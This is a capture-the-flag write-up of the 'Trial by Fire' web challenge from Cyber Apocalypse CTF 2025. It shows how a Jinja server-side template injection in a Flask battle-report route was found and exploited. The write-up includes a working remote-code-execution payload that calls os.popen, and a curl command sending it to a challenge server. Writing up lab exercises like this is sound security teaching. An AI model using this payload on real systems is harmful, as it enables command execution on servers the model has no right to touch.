๐ Trial by Fire
A detailed write-up of the Web challenge 'Trial by Fire' from Cyber Apocalypse CTF - 2025
๐ Challenge Overview
Category Details Additional Info ๐ Event Cyber Apocalypse CTF - 2025 Event Link ๐ฐ Category Web ๐ ๐ Points 1000 Out of 1000 total โญ Difficulty ๐ข Easy Personal Rating: 2/10 ๐ค Author Unknown Profile ๐ฎ Solves (At the time of flag submission) 24 solve rate ๐ Date 21-03-2025 Cyber Apocalypse CTF - 2025 ๐ฆพ Solved By mH4ck3r0n3 Team: QnQSec
๐ Challenge Information
As you ascend the treacherous slopes of the Flame Peaks, the scorching heat and shifting volcanic terrain test your endurance with every step. Rivers of molten lava carve fiery paths through the mountains, illuminating the night with an eerie crimson glow. The air is thick with ash, and the distant rumble of the earth warns of the danger that lies ahead. At the heart of this infernal landscape, a colossal Fire Drake awaitsโa guardian of flame and fury, determined to judge those who dare trespass. With eyes like embers and scales hardened by centuries of heat, the Fire Drake does not attack blindly. Instead, it weaves illusions of fear, manifesting your deepest doubts and past failures. To reach the Emberstone, the legendary artifact hidden beyond its lair, you must prove your resilience, defying both the drakeโs scorching onslaught and the mental trials it conjures. Stand firm, outwit its trickery, and strike with precisionโonly those with unyielding courage and strategic mastery will endure the Trial by Fire and claim their place among the legends of Eldoria.
๐ฏ Challenge Files & Infrastructure
Provided Files
Files:
๐ Initial Analysis
First Steps
Initially, the website appears as follows:
Upon entering the name, I was redirected to the following page:
It’s a web application simulating a battle against a dragon. Once the
battle
was over, I was redirected to/battle-report
:where all the battle statistics were displayed. I then decided to analyze the attached files. Inside the
challenge/application/blueprints
folder, I found theroutes.py
file (itโs aFlask
application), where all the routes for the web application were defined. I noticed that the/battle-report
route built a template by inserting parameters directly from the request:
1 2 3 4 5 6 7 8 9 10 11 12
@web.route('/battle-report', methods=['POST']) def battle_report(): warrior_name = session.get("warrior_name", "Unknown Warrior") battle_duration = request.form.get('battle_duration', "0") stats = { 'damage_dealt': request.form.get('damage_dealt', "0"), 'damage_taken': request.form.get('damage_taken', "0"), 'spells_cast': request.form.get('spells_cast', "0"), 'turns_survived': request.form.get('turns_survived', "0"), 'outcome': request.form.get('outcome', 'defeat') }
As we can see, these are the same parameters displayed in the previous screenshot. From this, we can already suspect that this is a
SSTI
(Server-Side Template Injection) vulnerability inJinja
. Letโs proceed to the next phase.
๐ฌ Vulnerability Analysis
Potential Vulnerabilities
- SSTI (Server Side Template Injection)
๐ฏ Solution Path
Exploitation Steps
Initial setup
Since the name was one of the parameters and it was the only one I could pass without making a
POST
request directly to/battle-report
, I decided to check if there was a template injection vulnerability by registering with the name{{ 7*7 }}
. If there was indeed a template injection, after completing the battle, I would be redirected to/battle-report
, and7*7
would be evaluated, resulting in49
. So, I entered{{ 7*7 }}
:After doing this, I completed the battle against the dragon and got:
As we can see, my name is no longer
{{ 7*7 }}
, but49
, which confirms that the parameters are indeed vulnerable to SSTI. Letโs move on to the exploitation phase.
Exploitation
Now, I need to read the
flag.txt
file. To do this, I searched for a payload on HackTricks, and modified it to executecat flag.txt
:
1
{{ config.__class__.from_envvar.__globals__.import_string("os").popen("cat flag.txt").read() }}
After that, I used
curl
to make aPOST
request directly to/battle-report
, as thename
parameter is vulnerable, but thereโs a character limit, so I couldnโt insert the entire payload there:
1
curl -X POST -d "battle_duration=1&damage_dealt={{ config.__class__.from_envvar.__globals__.import_string('os').popen('cat flag.txt').read() }}&damage_taken=0&spells_cast=0&turns_survived=0&outcome=defeat" http://83.136.253.44:40436/battle-report
Once I got the response, I searched for
HTB
intmux
and found the flag.
Flag capture
๐ ๏ธ Exploitation Process
Approach
The automated exploit sends a
POST
request with theSSTI
and extracts the flag from the response using a regex.
๐ฉ Flag Capture
FlagHTB{Fl4m3_P34ks_Tr14l_Burn5_Br1ght_0d0e0caef6ee5a6f91194c9428941362}
Proof of Execution
๐ง Tools Used
Tool Purpose Python Exploit Curl Web Testing
๐ก Key Learnings
Skills Improved
- Binary Exploitation
- Reverse Engineering
- Web Exploitation
- Cryptography
- Forensics
- OSINT
- Miscellaneous
๐ References & Resources
Learning Resources
๐ Final Statistics
Metric | Value | Notes |
---|---|---|
Time to Solve | 00:10 | From start to flag |
Global Ranking (At the time of flag submission) | 24/6487 | Challenge ranking |
Points Earned | 1000 | Team contribution |
Created: 21-03-2025 โข Last Modified: 21-03-2025 Author: mH4ck3r0n3 โข Team: QnQSec